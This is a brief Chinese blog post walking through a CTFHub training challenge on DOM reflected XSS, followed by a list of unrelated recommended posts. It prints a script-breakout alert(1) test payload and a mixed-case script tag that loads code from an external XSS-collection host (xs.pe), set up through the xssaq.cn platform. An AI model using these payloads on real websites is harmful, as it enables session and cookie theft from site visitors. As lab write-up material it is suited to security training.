根据框里的内容 直接右键查看网页源代码 看到 了其闭合方式
然后去网页测试一下alert(1)反射
';</script><script>alert(1)</script>
看到 确实存在 去xssaq.cn
创建一个项目 把src粘过来 在第一个输入框中 再将返回回来的url 复制粘贴到第二个 输入框中
';</script><sCRiPt sRC=//xs.pe/Eoo></sCrIpT>
CTFHub技能树web——XSS——DOM反射
A 八方2024-08-06 21:41
相关推荐
morris1311 小时前
【SpringBoot】Xss的常见攻击方式与防御手段我要洋人死1 小时前
导航栏及下拉菜单的实现科技探秘人1 小时前
Chrome与火狐哪个浏览器的隐私追踪功能更好科技探秘人1 小时前
Chrome与傲游浏览器性能与功能的深度对比JerryXZR1 小时前
前端开发中ES6的技术细节二七星静香1 小时前
laravel chunkById 分块查询 使用时的问题q2498596931 小时前
前端预览word、excel、ppt小华同学ai1 小时前
wflow-web:开源啦 ,高仿钉钉、飞书、企业微信的审批流程设计器,轻松打造属于你的工作流设计器Gavin_9152 小时前
【JavaScript】模块化开发懒大王爱吃狼3 小时前
Python教程:python枚举类定义和使用